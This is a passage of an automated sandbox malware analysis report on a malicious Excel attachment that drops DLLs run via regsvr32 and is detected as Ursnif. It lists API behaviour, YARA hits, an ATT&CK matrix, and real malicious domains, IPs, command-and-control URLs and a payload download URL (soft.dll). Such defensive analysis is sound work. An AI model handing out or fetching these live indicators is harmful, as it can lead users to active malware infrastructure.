              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to dropped file
              Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-15598
              Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6152Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-15599
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D2DD7D _memset,IsDebuggerPresent,3_2_67D2DD7D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D48402 ___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,3_2_67D48402
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F7C LoadLibraryA,GetProcAddress,3_2_67CD1F7C
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA7188 mov eax, dword ptr fs:[00000030h]3_2_67DA7188
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA6CC5 push dword ptr fs:[00000030h]3_2_67DA6CC5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67DA70BE mov eax, dword ptr fs:[00000030h]3_2_67DA70BE
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35139 GetProcessHeap,3_2_67D35139
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35ED2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_67D35ED2
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67D35EA1 SetUnhandledExceptionFilter,3_2_67D35EA1

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              System process connects to network (likely due to code injection or exploit)Show sources
              Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 185.233.80.31 80Jump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: app.bighomegl.at
              Source: Yara matchFile source: app.xml, type: SAMPLE
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: regsvr32.exe, 00000003.00000002.584579403.0000000003760000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_67CD1E8A
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,3_2_67D3E72D
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,3_2_67D3ED99
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,3_2_67D3ED13
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,3_2_67D3E538
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_67D3E4B5
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,3_2_67D3E438
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: EnumSystemLocalesW,3_2_67D3E3DC
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,3_2_67D33BC0
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_67D3FA7E
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,3_2_67D3E168
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,3_2_67D3E904
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_67D3E857
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_67CD1144
              Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_67CD1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_67CD1F10
              Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected UrsnifShow sources
              Source: Yara matchFile source: 00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.586749442.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326338980.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326396498.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.326427141.0000000005958000.00000004.00000040.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6180, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection12Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSecurity Software Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsExploitation for Client Execution4Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSVirtualization/Sandbox Evasion1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonScripting1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemSystem Information Discovery125Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433009 Sample: my_attach_82862.xlsb Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 36 authd.feronok.com 2->36 48 Multi AV Scanner detection for domain / URL 2->48 50 Found malware configuration 2->50 52 Antivirus detection for URL or domain 2->52 54 9 other signatures 2->54 7 EXCEL.EXE 27 43 2->7         started        12 iexplore.exe 2 83 2->12         started        14 iexplore.exe 1 50 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 46 quickbooks.aeymotors.com 50.87.220.158, 443, 49714 UNIFIEDLAYER-AS-1US United States 7->46 30 C:\Users\user\AppData\Local\...\soft[1].dll, PE32 7->30 dropped 32 C:\Users\Public\SettingSyncY.dll, PE32 7->32 dropped 34 C:\Users\user\...\~$my_attach_82862.xlsb, data 7->34 dropped 62 Document exploit detected (creates forbidden files) 7->62 64 Document exploit detected (UrlDownloadToFile) 7->64 18 regsvr32.exe 7->18         started        22 iexplore.exe 38 12->22         started        24 iexplore.exe 35 14->24         started        26 iexplore.exe 35 16->26         started        28 iexplore.exe 35 16->28         started        file6 signatures7 process8 dnsIp9 56 System process connects to network (likely due to code injection or exploit) 18->56 58 Writes or reads registry keys via WMI 18->58 60 Writes registry values via WMI 18->60 38 app.bighomegl.at 185.233.80.31, 49731, 49732, 49742 SUPERSERVERSDATACENTERRU Russian Federation 22->38 40 authd.feronok.com 22->40 42 authd.feronok.com 24->42 44 authd.feronok.com 28->44 signatures10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              No Antivirus matches

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\SettingSyncY.dll6%MetadefenderBrowse
              C:\Users\Public\SettingSyncY.dll4%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll6%MetadefenderBrowse
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll4%ReversingLabs

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              3.2.regsvr32.exe.3010000.1.unpack100%AviraHEUR/AGEN.1108168Download File

              Domains

              SourceDetectionScannerLabelLink
              authd.feronok.com11%VirustotalBrowse
              app.bighomegl.at7%VirustotalBrowse
              quickbooks.aeymotors.com3%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://cdn.entity.0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://powerlift.acompli.net0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://cortana.ai0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://api.aadrm.com/0%URL Reputationsafe
              https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
              https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
              https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_20%Avira URL Cloudsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              https://store.office.cn/addinstemplate0%URL Reputationsafe
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L30%Avira URL Cloudsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://store.officeppe.com/addinstemplate0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://www.odwebp.svc.ms0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://dataservice.o365filtering.com/0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://ncus.contentsync.0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://apis.live.net/v5.0/0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://wus2.contentsync.0%URL Reputationsafe
              https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ0%Avira URL Cloudsafe
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/0%Avira URL Cloudsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://ncus.pagecontentsync.0%URL Reputationsafe
              https://quickbooks.aeymotors.com/soft.dll100%Avira URL Cloudmalware
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe
              https://skyapi.live.net/Activity/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              authd.feronok.com
              		185.233.80.31
              		truetrueunknown
              app.bighomegl.at
              		185.233.80.31
              		truetrueunknown
              quickbooks.aeymotors.com
              		50.87.220.158
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3true
              • Avira URL Cloud: safe
              		unknown
              http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://api.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                		high
                https://login.microsoftonline.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                  		high
                  https://shell.suite.office.com:1443D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                    		high
                    https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                      		high
                      https://autodiscover-s.outlook.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                        		high
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                          		high
                          https://cdn.entity.D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://api.addins.omex.office.net/appinfo/queryD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                            		high
                            https://clients.config.office.net/user/v1.0/tenantassociationkeyD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                              		high
                              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                		high
                                https://powerlift.acompli.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://rpsticket.partnerservices.getmicrosoftkey.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://lookup.onenote.com/lookup/geolocation/v1D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                  		high
                                  https://cortana.aiD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                    		high
                                    https://cloudfiles.onenote.com/upload.aspxD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                      		high
                                      https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                        		high
                                        https://entitlement.diagnosticssdf.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                          		high
                                          https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            		high
                                            https://api.aadrm.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://ofcrecsvcapi-int.azurewebsites.net/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                            • 0%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                              		high
                                              https://api.microsoftstream.com/api/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                		high
                                                https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                  		high
                                                  https://cr.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                    		high
                                                    https://portal.office.com/account/?ref=ClientMeControlD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                      		high
                                                      http://www.reddit.com/msapplication.xml4.20.drfalse
                                                        		high
                                                        https://graph.ppe.windows.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          		high
                                                          https://res.getmicrosoftkey.com/api/redemptioneventsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://powerlift-frontdesk.acompli.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://tasks.office.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                            		high
                                                            https://officeci.azurewebsites.net/api/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.drtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://sr.outlook.office.net/ws/speech/recognize/assistant/workD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                              		high
                                                              https://store.office.cn/addinstemplateD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://outlook.office.com/autosuggest/api/v1/init?cvid=D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                		high
                                                                https://globaldisco.crm.dynamics.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    		high
                                                                    https://store.officeppe.com/addinstemplateD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dev0-api.acompli.net/autodetectD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.odwebp.svc.msD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groupsD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                        		high
                                                                        https://graph.windows.netD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          		high
                                                                          https://dataservice.o365filtering.com/D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://officesetup.getmicrosoftkey.comD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://analysis.windows.net/powerbi/apiD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                            		high
                                                                            https://prod-global-autodetect.acompli.net/autodetectD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.jsonD18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drfalse
